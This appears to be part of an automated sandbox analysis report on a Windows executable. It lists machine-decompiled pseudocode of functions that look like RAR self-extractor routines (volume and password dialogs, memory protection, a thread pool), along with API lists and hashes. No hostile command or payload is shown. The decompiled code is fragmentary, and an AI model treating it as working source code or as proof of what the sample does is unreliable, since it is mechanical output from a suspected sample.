				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0021A7B3(_t52);
					GetModuleFileNameA(0, 0x2502b8, 0x104);
					_t49 =  *0x250868; // 0xda32f0
					 *0x250870 = 0x2502b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x2502b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00216D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00216F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00216D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0021A2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x25085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x250860 = _t59;
									L16:
									E00217A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x25085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x250860 = _t43;
						goto L10;
					} else {
						_t44 = E00217ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00217A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00217ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00217DAB();
					return _t65;
				}
			}





















          0x00216c73
          0x00216c80
          0x00216ca0
          0x00216cb3
          0x00216cb9
          0x00216cbf
          0x00216cc7
          0x00216cce
          0x00216cce
          0x00216cd3
          0x00216cda
          0x00216ce1
          0x00216cf3
          0x00216cfa
          0x00216d19
          0x00216d25
          0x00216d40
          0x00216d43
          0x00216d4a
          0x00216d50
          0x00216d57
          0x00216d5a
          0x00216d5c
          0x00216d60
          0x00216d6a
          0x00216d6a
          0x00216d6c
          0x00216d72
          0x00216d75
          0x00216d77
          0x00216d7d
          0x00216d7e
          0x00216d84
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00216d62
          0x00216d62
          0x00216d62
          0x00216d65
          0x00216d66
          0x00000000
          0x00216d62
          0x00216d52
          0x00000000
          0x00216d52
          0x00216d2b
          0x00216d30
          0x00216d32
          0x00216d34
          0x00000000
          0x00216cfc
          0x00216cfc
          0x00216d01
          0x00216d03
          0x00216d04
          0x00216d39
          0x00216d39
          0x00216d87
          0x00216d88
          0x00000000
          0x00216d91
          0x00216c88
          0x00216c88
          0x00216c8f
          0x00216c90
          0x00216c92
          0x00000000
          0x00216c97

          APIs
          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dUzAkYsvl8.exe,00000104), ref: 00216CB3
          • _free.LIBCMT ref: 00216D7E
          • _free.LIBCMT ref: 00216D88
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$FileModuleName
          • String ID: C:\Users\user\Desktop\dUzAkYsvl8.exe
          • API String ID: 2506810119-2066119735
          • Opcode ID: 07148a6f36f590bbf1af69ff0cc4506378c2a2114ee8fde801f82934323bc718
          • Instruction ID: c955b63efae9d955b9f9fc72b3338bde58d7b48179c6835a276169e93298d1dd
          • Opcode Fuzzy Hash: 07148a6f36f590bbf1af69ff0cc4506378c2a2114ee8fde801f82934323bc718
          • Instruction Fuzzy Hash: 22314FB1A14319ABCB21DF99AC89DEEBBF8EFA5310F104066F80497211D6715EA1CF91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F73B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
          Download Yara Rule
          C-Code - Quality: 63%
          			E001F73B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0020D870(E00221321, _t61);
				E0020D940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E001F399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x230042 == 0) {
						if(E001F7A15(L"SeSecurityPrivilege") != 0) {
							 *0x230041 = 1;
						}
						E001F7A15(L"SeRestorePrivilege");
						 *0x230042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x230041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x22de80() == 0) {
						if(E001FB32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E001F6BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E0020E214(_t32);
							if(_t32 == 5 && E001FFC98() == 0) {
								E001F1567(_t61 - 0x6c, 0x18);
								E00200A9F(_t61 - 0x6c);
							}
							E001F6E03(0x2300e0, 1);
						} else {
							_t39 =  *0x22de80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E001F159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












          0x001f73b9
          0x001f73b9
          0x001f73b9
          0x001f73be
          0x001f73c8
          0x001f73d0
          0x001f73d3
          0x001f73d6
          0x001f73d9
          0x001f73dc
          0x001f73df
          0x001f73e4
          0x001f73e5
          0x001f73e6
          0x001f73ec
          0x001f73f4
          0x001f7401
          0x001f740f
          0x001f7411
          0x001f7411
          0x001f741d
          0x001f7422
          0x001f7422
          0x001f7430
          0x001f7433
          0x001f7434
          0x001f7438
          0x001f7438
          0x001f7439
          0x001f743a
          0x001f743d
          0x001f743e
          0x001f743f
          0x001f744a
          0x001f7462
          0x001f7477
          0x001f7480
          0x001f7485
          0x001f7494
          0x001f749c
          0x001f74ac
          0x001f74b4
          0x001f74b4
          0x001f74bd
          0x001f7464
          0x001f746d
          0x001f7473
          0x001f7475
          0x00000000
          0x00000000
          0x001f7475
          0x001f7462
          0x001f74c3
          0x001f74c7
          0x001f74d0
          0x001f74da

          APIs
          • __EH_prolog.LIBCMT ref: 001F73BE
            • Part of subcall function 001F399D: __EH_prolog.LIBCMT ref: 001F39A2
          • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001F7485
            • Part of subcall function 001F7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 001F7A24
            • Part of subcall function 001F7A15: GetLastError.KERNEL32 ref: 001F7A6A
            • Part of subcall function 001F7A15: CloseHandle.KERNEL32(?), ref: 001F7A79
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
          • String ID: SeRestorePrivilege$SeSecurityPrivilege
          • API String ID: 3813983858-639343689
          • Opcode ID: 65a3139f781035ad3c5f254b4f6b1bc99e824772e26f06058d5c55234ef33bbc
          • Instruction ID: 090f896cad2daa6a070f95808593ca19f7b55cae2248aa3afa8d9929567c1ca7
          • Opcode Fuzzy Hash: 65a3139f781035ad3c5f254b4f6b1bc99e824772e26f06058d5c55234ef33bbc
          • Instruction Fuzzy Hash: 6B31A171A0420CAADF20EBA8EC45BFE7B69AF65304F044055FA09E7192C7B54A55CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
          Download Yara Rule
          C-Code - Quality: 62%
          			E00209B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E001F12D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x24fe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x24fe38), ( *0x24fe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E001FB943(__eflags,  *( *0x24fe38)));
					_push( *( *0x24fe38));
					_push(E001FDA42(_t25, 0x8e));
					_t22 = E001F10B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x24fe38));
					goto L13;
				}
				goto L6;
			}












          0x00209b8e
          0x00209b93
          0x00209b98
          0x00209b9d
          0x00209bb5
          0x00209c45
          0x00209c47
          0x00000000
          0x00209c47
          0x00209bbb
          0x00209bc1
          0x00209c34
          0x00209c36
          0x00209c3c
          0x00209c3f
          0x00000000
          0x00209c3f
          0x00209bc6
          0x00209bda
          0x00000000
          0x00209bda
          0x00209bcb
          0x00209bce
          0x00209c2a
          0x00209c30
          0x00209c14
          0x00209c15
          0x00000000
          0x00209c15
          0x00209bd0
          0x00209bd3
          0x00209c12
          0x00000000
          0x00209c12
          0x00209bd8
          0x00209be3
          0x00209bec
          0x00209bf2
          0x00209bfe
          0x00209c00
          0x00209c05
          0x00209c07
          0x00000000
          0x00000000
          0x00209c0e
          0x00000000
          0x00209c0e
          0x00000000

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 00209C15
          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00209C2A
          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00209C3F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: ASKNEXTVOL
          • API String ID: 445417207-3402441367
          • Opcode ID: a82268066de80d01e65be7bdd468076056a56ad2325207eab03e260310364c6d
          • Instruction ID: c114fd07b058ca5ded177ecb053f42d5b70ef4b2afe9f8bf076c5aa8c6ef462e
          • Opcode Fuzzy Hash: a82268066de80d01e65be7bdd468076056a56ad2325207eab03e260310364c6d
          • Instruction Fuzzy Hash: 10118733754205BFE7119FA4ED4DF6637A9EB5B701F140011F2029A0F3C7A599A29729
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FE862, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
          Download Yara Rule
          C-Code - Quality: 20%
          			E001FE862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0x237358; // 0x0
				if(_t11 == 0) {
					E001FE7E3(0x237350);
					_t11 =  *0x237358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0x23735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0x2300e0);
							_t13 = E001F6CC9(E0020E214(E001F6CCE(_t22)), 0x2300e0, 0x2300e0, 2);
						}
					}
				}
				return _t13;
			}

















          0x001fe862
          0x001fe862
          0x001fe865
          0x001fe86c
          0x001fe873
          0x001fe878
          0x001fe878
          0x001fe87e
          0x001fe885
          0x001fe88b
          0x001fe892
          0x001fe8c7
          0x001fe8ce
          0x00000000
          0x001fe8d0
          0x001fe8d5
          0x001fe8d9
          0x001fe8db
          0x00000000
          0x001fe8db
          0x001fe8d9
          0x001fe894
          0x001fe896
          0x001fe8e2
          0x001fe8e2
          0x001fe8e3
          0x001fe8e9
          0x001fe8eb
          0x001fe8ef
          0x001fe8f1
          0x001fe8f2
          0x001fe8f5
          0x001fe8f8
          0x001fe8fb
          0x001fe8fe
          0x001fe900
          0x001fe901
          0x001fe905
          0x001fe898
          0x001fe89d
          0x001fe8a1
          0x001fe8a3
          0x001fe8a8
          0x001fe8ad
          0x001fe8c0
          0x001fe8c0
          0x001fe8a1
          0x001fe896
          0x001fe909

          APIs
            • Part of subcall function 001FE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001FE802
            • Part of subcall function 001FE7E3: GetProcAddress.KERNEL32(00237350,CryptUnprotectMemory), ref: 001FE812
          • GetCurrentProcessId.KERNEL32(?,?,?,001FE85C), ref: 001FE8E3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressProc$CurrentProcess
          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$Ps#
          • API String ID: 2190909847-2377627361
          • Opcode ID: 4dacfe9b4ecbbb0444a398f2676e90f69185a5e3b12c25a94d0708c71e9d33d8
          • Instruction ID: 2bceb43bc0eb8e2f7ffb8832df794945ee552dd113441da8c5e2f50d58d4d5eb
          • Opcode Fuzzy Hash: 4dacfe9b4ecbbb0444a398f2676e90f69185a5e3b12c25a94d0708c71e9d33d8
          • Instruction Fuzzy Hash: 9B117A3070421D7BEF24AB38DC45BBA37C9EF84BA4F044029FB049B1B2DB60DD50A2A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FCE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E001FCE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E002011FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E001FFA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E001FD9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0xdc2718
					_t30 = E00214E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E001FCC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x22d158 +  *_t30 * 0xc; // 0x2233e0
						E002154E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














          0x001fce52
          0x001fce52
          0x001fce52
          0x001fce53
          0x001fce57
          0x001fce5e
          0x001fce64
          0x001fce74
          0x001fce7a
          0x001fce7e
          0x001fce81
          0x001fce8c
          0x001fce8c
          0x001fce94
          0x001fce97
          0x001fced2
          0x001fce99
          0x001fce99
          0x001fce9c
          0x001fceb1
          0x001fceb2
          0x00000000
          0x001fce9e
          0x001fcea1
          0x001fcea6
          0x001fcea7
          0x001fceb7
          0x001fceba
          0x001fcebc
          0x001fcebd
          0x001fcec2
          0x001fcec2
          0x001fcea1
          0x001fce9c
          0x001fcede
          0x001fcee4
          0x001fcee8
          0x001fcef2
          0x00000000
          0x001fcef8
          0x001fcefe
          0x001fcf07
          0x001fcf0f
          0x001fcf0f
          0x001fce66
          0x001fce66
          0x001fce66
          0x001fce66
          0x001fcf16

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __fprintf_l_strncpy
          • String ID: $%s$@%s
          • API String ID: 1857242416-834177443
          • Opcode ID: 7fdcedd9ffcbdaa8e4fb9ebedec96ad91f500e1190b8a9ea78db6ea6bc818ea7
          • Instruction ID: 86ca81df2978a0e92bc550731271903a7461158a85d538a937868f4b88e9de08
          • Opcode Fuzzy Hash: 7fdcedd9ffcbdaa8e4fb9ebedec96ad91f500e1190b8a9ea78db6ea6bc818ea7
          • Instruction Fuzzy Hash: 87216D7245030CAEDB20DEA4DE05FFE7BA8AB15700F040026FB14965A2E371D669ABA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020A0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
          Download Yara Rule
          C-Code - Quality: 83%
          			E0020A0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E001F12D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E001FE90C(_t24, 0x245c00,  &_v260);
					E001FE957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










          0x0020a0ba
          0x0020a0be
          0x0020a0c2
          0x0020a0db
          0x0020a14a
          0x00000000
          0x0020a14c
          0x0020a0dd
          0x0020a0e3
          0x0020a144
          0x00000000
          0x0020a144
          0x0020a0e8
          0x0020a0f7
          0x00000000
          0x0020a0f7
          0x0020a0ed
          0x0020a0f0
          0x0020a116
          0x0020a128
          0x0020a135
          0x0020a13a
          0x0020a0fd
          0x0020a0fe
          0x00000000
          0x0020a0fe
          0x0020a0f5
          0x0020a0fb
          0x00000000
          0x0020a0fb
          0x00000000

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020A0FE
          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0020A116
          • SetDlgItemTextW.USER32(?,00000067,?), ref: 0020A144
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: GETPASSWORD1
          • API String ID: 445417207-3292211884
          • Opcode ID: 43d8da99bf4a2072379ffa8bebd6c53c1341166cf1715fd8d75ba8823d0d0761
          • Instruction ID: 6376121b3f4a9c845e3a614944c0e927a12c43b9c99b51533ba056ca2c30c592
          • Opcode Fuzzy Hash: 43d8da99bf4a2072379ffa8bebd6c53c1341166cf1715fd8d75ba8823d0d0761
          • Instruction Fuzzy Hash: C311083296031DB7DB219EA8AD49FFB7B7CEF09740F400011FA49B24C1C6A599618672
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FB1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
          Download Yara Rule
          C-Code - Quality: 70%
          			E001FB1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E001FB4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00210BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00210BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00212B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00214DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E001F3E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











          0x001fb1b8
          0x001fb1bf
          0x001fb1c4
          0x001fb1c7
          0x001fb1ce
          0x001fb1eb
          0x001fb1ef
          0x001fb1fa
          0x001fb1fb
          0x001fb1fc
          0x001fb202
          0x001fb205
          0x001fb20a
          0x001fb20b
          0x001fb20c
          0x001fb215
          0x001fb21f
          0x001fb217
          0x001fb21b
          0x001fb21b
          0x001fb229
          0x001fb22b
          0x001fb230
          0x001fb238
          0x001fb23a
          0x001fb23a
          0x001fb205
          0x00000000
          0x001fb23e
          0x00000000

          APIs
          • _swprintf.LIBCMT ref: 001FB1DE
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • _wcschr.LIBVCRUNTIME ref: 001FB1FC
          • _wcschr.LIBVCRUNTIME ref: 001FB20C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcschr$__vswprintf_c_l_swprintf
          • String ID: %c:\
          • API String ID: 525462905-3142399695
          • Opcode ID: 259a9b2bbb34426422b73e7e2e1061c8492bbc424cf52e8ce976077d4bb6ae59
          • Instruction ID: 5c35c3361a2bc42a31568a434e4d5fce6b4dc7e0da37090e6a189cdf3dd7c39e
          • Opcode Fuzzy Hash: 259a9b2bbb34426422b73e7e2e1061c8492bbc424cf52e8ce976077d4bb6ae59
          • Instruction Fuzzy Hash: 86014913408315799B306B74DCC2D7FA7ECDE667607448406F944C2082FB30E8A4C2B1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00200326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
          Download Yara Rule
          C-Code - Quality: 74%
          			E00200326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x2300e0);
					E001F6CC9(E001F6CCE(_t19), 0x2300e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









          0x00200326
          0x00200326
          0x0020032e
          0x00200332
          0x00200333
          0x00200337
          0x00200339
          0x00200339
          0x00200342
          0x00200344
          0x00200344
